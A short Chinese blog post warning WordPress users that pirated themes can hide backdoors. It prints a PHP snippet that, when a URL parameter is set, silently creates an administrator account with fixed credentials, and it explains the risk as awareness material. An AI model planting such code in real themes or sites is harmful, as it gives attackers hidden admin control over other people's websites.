WordPress盗版主题暗藏后门

WordPress盗版主题暗藏后门

wordpress 2023-10-29编辑：深圳网站建设阅读（） WordPress 暗藏 后门

前言

俗话说的好天下没有免费的午餐，你要相信没有人傻到做亏本生意，都是会有目的性的。最近我在网上看到一篇文章，写了WordPress的暗藏后门，觉得很有一说，所以就发一下让更多的WP友友们看到，不要轻易随便乱使用模板。

后门代码

add_action(‘wp_head’, ‘holeinthewall’);
function holeinthewall() {
If ($_GET[‘backdoor’] == ‘go’) {
require(‘wp-includes/registration.php’);
If (!username_exists(‘username’)) {
$user_id = wp_create_user(‘username’, ‘password’);
$user = new WP_User($user_id);
$user->set_role(‘administrator’);
}}}

由以上的代码我们可以看出，如果把这段代码插入到你的主题函数文件functions.php中的话，然后就会自动创建一个用户名为username，密码为password的有管理员权限的账户，然后恶意人员就可以登录到你的网站后台，后果你可以自己想象一下。

所以憧憬博主在这里建议大家不要随便乱使用WordPress的盗版主题，支持正版，抵制盗版，尊重开发者的劳动成果。

• 上一章：WordPress付费会员制虚拟资源下载网站主...
• 下一章：WordPress VIP付费下载插件Erphpdown v...